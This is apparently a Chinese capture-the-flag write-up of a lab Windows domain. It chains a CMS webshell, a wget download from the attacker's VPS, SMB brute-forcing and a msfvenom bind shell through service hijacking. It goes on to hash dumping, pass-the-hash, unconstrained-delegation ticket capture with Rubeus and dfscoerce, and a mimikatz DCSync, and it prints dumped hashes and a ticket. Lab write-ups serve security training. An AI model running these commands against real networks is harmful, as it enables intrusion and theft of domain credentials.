共计 4988 个字符，预计需要花费 13 分钟才能阅读完成。

flag01

首页是一个 cms，存在弱口令 admin/123456

版本比较老了，找找有没有历史 CVE

找了半天没找到，算了自己测试吧。
发现 html 模板可以加载 php 代码？？？
然后直接在编辑模板处把 index.html 修改成一句话木马

但是测试下来发现不知道为什么只能用 system

后面发现应该是和 index.php 冲突了之类的
然后可以在自己的 VPS 上写个木马，使用 wget http://xxxxxx/shell3.php下载木马并用蚁剑连接

执行命令有问题的话用下蚁剑的绕 disable_function，我这里刚刚还有问题现在又没了不知道为什么
看一下 suid 提权，发现存在 diff

直接拿到 flag 了

flag02

使用 vshell 搭建代理
依旧 fscan 内网扫描

(icmp) Target 172.22.4.19     is alive#FILESERVER.xiaorang.lab
(icmp) Target 172.22.4.7      is alive#DC:DC01.xiaorang.lab
(icmp) Target 172.22.4.45     is alive#XIAORANGWIN19
(icmp) Target 172.22.4.36     is alive# 立足点

然后根据刚刚 flag01 的提示去爆破密码

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

发现一个过期的密码

尝试 rdp 远程上去
proxychains rdesktop 172.22.4.45
发现桌面有个文件夹，看看生成的 html 文件然后根据文件提示修改注册表 gupdate 但是这里需要 msfconsole 了之前用的 vshell 建立代理隧道有点不方便，想了下可以用 msf 正向连接

proxychains4rdesktop -r disk:LinuxShare=/home/kali <Windows_IP>
然后操作 msfconsole
先生成一个服务马，正常的马会挂掉

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f exe-service -o service_bind.exe 生成后复制到 windows 的桌面

打开靶机的 cmd

reg add HKLMSYSTEMCurrentControlSetServicesgupdate /v ImagePath /t REG_EXPAND_SZ /d "C:UsersAdrianDesktopservice_bind.exe" 
sc start gupdate

正向连接

proxychains4 msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 4444
run

拿到 flag

flag03 and flag04

hashdump 一下

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

然后 load kiwi 再 creds_all 获取域内用户 hash

Username  Domain    NTLM                              SHA1
--------  ------    ----                              ----
Adrian    WIN19     68365827d79c4f5cc9b52b688495fd51  41ab23d1abfc618a7c05ee1a45f999799357f4dc
WIN19$    XIAORANG  c3f992027a4f8bbca096e95d6836a41e  2e1b2cbcbc78c761ab22f5ea3cb84ea850ecc3af
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

在 msf 里面操作不方便，新建一个管理用户来吧

proxychains python psexec.py Administrator@172.22.4.45 -hashes :ba21c629d9fd56aff10c3e826323e6ab -codec gbk

重新用管理员用户连接
收集一下域内信息
利用工具 lzzbb/Adinfo: 域信息收集工具 (github.com) 进行信息收集。

发现一个 非约束委派,，那么只要域控来访问我们的服务，就会在我们本地的 lsass 进程中缓存目标的 TGT。

上传一个 Rubeus，准备进行抓取票据（也可以考虑用 mimikatz）
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$
用 dfscoerce 触发 rpc 使 dc 向 WIN19 认证，这里接收端使用 ip 的时候成功率不高
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :c3f992027a4f8bbca096e95d6836a41e -d xiaorang.lab win19 172.22.4.7

我这里一直接收不到票据，就先用别人的图吧


票据注入，命令如下

Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Gu8cmnn/yivAbsIBGb083yJDB6dJRODHP1bjAfZvoz1YoZnroLlPjLrdCWRsj6+UL1JS+ZwTD5uUIrULi8ofZ+7vTw/ZJ3jDupn7VZM8vvgAcQnVurgK98Cj9jAdCm+Fy0kAIgWN/aWuw12x+lJ8t3O2B7esYh+mYQsLrqMqE+B5ORHxHU7SyLM9j8Ky11/rGPDjr72z6VewAFXVYEQo7+oaMQ84l/4BBGJVHXhlMQxrGJxnwiLw/X4chMEQ4rM8JQnxRggbhSg5TltT4g0QpTRjgp54OczjYJptkiGmAFOXGRSFNTjf460t+3w03rw9x8Gfyde3pYNYNktDCmEYrPq+4r8UlUTS5YOHr7pPogblzN57sLbYXbsGRdgAY/HzEqhcETSvi4qQ/jZU/59uS62oYrvjsEpAinAniyndHWp+hVD50OWcaCRwJGd1Q3XoQ9g1VqkkEa2k2aKh7cBxHw6uAG4Q1aKsNb9TyyZz/als1pUe6VFKWaGLjedwXKxYpF2fNbbR4OazHG+E3jNXJ5rSu2UKqr6r8wisfd52cqBx8BpPRZc+yf5EULPIbj7cLVnS0vp6Uvrc13AURc6s5NkUMFiMc+rXwUTF+bOouW5PjBApEIh/cT3XCg2Ems22K2jeJ9pRU9ZqccuOheGRu4gjPYEjpl48BZFJ0YNvQseUCs8plYZ7iOGh3pbq/ij/ImnEUe7RYLu3oEgMt5yjK4ptNGAxuH3I35dWKCDZ4692tH4W1sbx2yXYwVh2V7afMyFsIYsSmwDnUBGBB1KJY2Nq7XTu2cjWcXlEe1MtYuCdXGPc1mUBrjLOKfWlpAOowp9HgMyES6euks6uRRpugaCd9exWCNXTQ3HxgrXSXoJ9g3sT4wKBObqiY4RNWhImPC9bOTwCqR5LdKdTAPxwQyIFM5T14QmOpyrmeXmo0Ci+Q0Fm0w4NEZ0fi5zOxiKlbYMKKUgHsEDb6u90mXpdUYggfARpAnPPjzpbHA6AufTMhWSOpAwaXySzd6hEFBQfiZr79W0k/K4pCDMCrrN7IeM908XKGFmkt7b0Ti10xIX2dbfd7Oz5Kj8iSiLendtS8hXdu3j8Foxyigzaq78q03LH6adLVT8M7H/H5L2Yyj0pK8t7lgW8ruqnG9fCcEFvZF3riZ61Z7lOc1Ih0jPdbRxbxPNvEJ5cy81Z1rCMXlpsNikvdn3gyZcVMrQV0v6r5tpKbjXTWNzvuts7SCEhJQ1LAcWqTXnLmuOYTOIr5TOQ4laW0MYCmM4WzoizzgqF6B/GBBlaKjFq6sYs5WvrDrpU4oPSqWunEQYWqzv8WDQgpS6t4W1AI2YG5IEe5RcGS2rGGoYwALS+9ZxVh2QsGu2NPXGFb3BIj1nEFOdoqLzFW8TxqpHt3QuYLWb0UJWw0mbGCT7VRjmjLGBlBqbA86U0FZLjC8UmT54CUkwujgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCB12JvSkVI2yZgL857MedYXsBT+jZdt4RTe3dXQIjh1raEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDExMzA4NTEwNFqmERgPMjAyNDAxMTMxODUxMDRapxEYDzIwMjQwMTIwMDg1MTA0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

因为 dc 拥有 dcsync 的权限，所以直接可以获取域内所有的 hash。

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

成功拿到域管 hash

502     krbtgt  767e06b9c74fd628dd13785006a9092b        514
1105    Aldrich 98ce19dd5ce74f670d230c7b1aa016d0        512
1106    Marcus  b91c7cc463735bf0e599a2d0a04df110        512
1112    WIN-3X7U15C2XDM$        c3ddf0ffd17c48e6c40e6eda9c9fbaf7        4096
1113    WIN-YUUAW2QG9MF$        125d0e9790105be68deb6002690fc91b        4096
1000    DC01$   2aac0ab080878616924dee8d48190458        532480
500     Administrator   4889f6553239ace1f7c47fa2c619c252        512
1103    FILESERVER$     26eb4211fb2769c980125e4a432c7498        4096
1104    WIN19$  4017dab3eeaf981160632f84bbf00f73        528384

然后就是打 hash 传递不再复述了